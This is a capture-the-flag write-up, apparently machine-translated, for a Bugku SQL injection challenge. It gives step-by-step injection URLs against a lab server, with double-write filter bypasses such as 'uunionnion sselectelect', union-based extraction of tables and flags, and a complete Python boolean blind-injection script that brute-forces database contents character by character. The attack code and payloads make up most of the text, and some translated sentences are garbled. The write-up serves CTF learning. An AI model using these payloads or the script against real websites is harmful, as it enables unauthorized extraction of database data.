BUGKU multiple manual injection script blinds +

This article is SQL injection step manual + idea, and blinds script.

 http://123.206.87.240:9004/1ndex.php?id=1 

 http://123.206.87.240:9004/1ndex.php?id=1 '   error

 http://123.206.87.240:9004/1ndex.php?id=1'--+  normally present injection

 http://123.206.87.240:9004/1ndex.php?id=1 'and 1 = 1 - +   error and was filtered,

 

 http://123.206.87.240:9004/1ndex.php?id=1 ^(length(‘and’)!=0)^‘ 

Use filter length is determined to be filtered or union select stars

 

 http://123.206.87.240:9004/1ndex.php?id=1 'oorrder by 2 - +   normal write bypass bis

 http://123.206.87.240:9004/1ndex.php?id=1 'oorrder by 3 - +   given the presence of two libraries

 http://123.206.87.240:9004/1ndex.php?id=1 'aandnd 1 = 2 uunionnion sselectelect 1,2 - +  normal echo No. 2

 

To be injected into the number two position

 http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,database()--+ 

Database name web1002-1

 http://123.206.87.240:9004/1ndex.php?id=1‘ aandnd 1=2 uunionnion sselectelect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema = database() --+ 

Table flag1, hint

 123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name = 'flag1' --+ 

Field flag1, address

 http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(flag1) from flag1 --+ 

flag1 content: usOwycTju + FTUUzXosjr populated found not entitled to say there are two flag lowercase

 http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,group_concat(address) from flag1 --+ 

address content to the next level, click on the address to the next level: http://123.206.87.240:9004/Once_More.php?id=1

 http://123.206.87.240:9004/Once_More.php?id=1 '   error

 http://123.206.87.240:9004/Once_More.php?id=1 '- +   normally present injection

 http://123.206.87.240:9004/Once_More.php?id=1 'order by 2 - +   Normal

 http://123.206.87.240:9004/Once_More.php?id=1 'order by 3 - +   given the presence of two libraries

 http://123.206.87.240:9004/Once_More.php?id=1 '^ (length (' union ')! = 0) ^'   normal union is filtered

 http://123.206.87.240:9004/Once_More.php?id=1 'and 1 = 2 uunionnion select 1,2 - +   bis write can not be bypassed

 http://123.206.87.240:9004/Once_More.php?id=1 'and 1 = 2 Union select 1,2 - +   case can not be bypassed

 http://123.206.87.240:9004/Once_More.php?id=1 '^ (length (' sleep ')! = 0) ^'  normal sleep is also filtered by the filter substr

Since the return to correct an error trying to write a different script Bool blind

import sys
import requests
from bs4 import BeautifulSoup
import re


url_start = 'http://123.206.87.240:9004/Once_More.php?' 


sqldb ="id=1' and mid(database(),{0},1)='{1}'--+"
sqltb ="id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema = database()),{0},1)='{1}'--+"
sqltest ="id=1' and mid((select group_concat(column_name) from information_schema.columns where table_name ='flag2'),{0},1)='{1}'--+"
sqlflag ="id=1' and mid((select flag2 from flag2),{0},1)='{1}'--+"


def Brup(SQL):
    name=''
    for i in range(1,40):
        for ch in range(32,129):
            if ch == 128:
                sys.exit(0)
            payload = SQL.format(i,chr(ch))
            url_all = url_start+payload
            #print(url_all)
            html = requests.get(url_all)
            soup = BeautifulSoup(html.content, 'html.parser')
            result = soup.find_all(text = 'Hello,I Am Here!')
            #判断列表是否为空
            if len(result):
                name += chr(ch)
                print('name:'+name)
                break
        
if __name__ == '__main__':
    #Brup(sqldb)
    #Brup(sqltb)
    #Brup(sqltest)
    Brup(sqlflag)

#tablename：class,flag2
#Note: running out for the capital, flag all lowercase.

 

usOwycTju + FTUUzXosjr

 

 

web1002-1